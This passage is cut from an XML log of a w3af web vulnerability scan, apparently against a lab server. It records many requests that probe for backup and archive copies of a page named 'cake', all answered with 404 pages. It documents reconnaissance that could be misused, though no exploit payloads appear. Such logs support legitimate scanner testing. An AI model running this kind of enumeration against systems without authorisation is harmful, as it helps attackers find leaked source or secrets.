                    <status>GET http://10.12.68.43:31337/cake.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="346">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about cake~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='cake~'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="347">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="348">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="349">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="350">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="351">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="352">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="353">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="354">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="355">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="356">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="358">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="359">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="360">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="361">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="362">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="363">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="367">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="369">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="370">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="371">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.backup HTTP/1.1</status>
                    <headers>
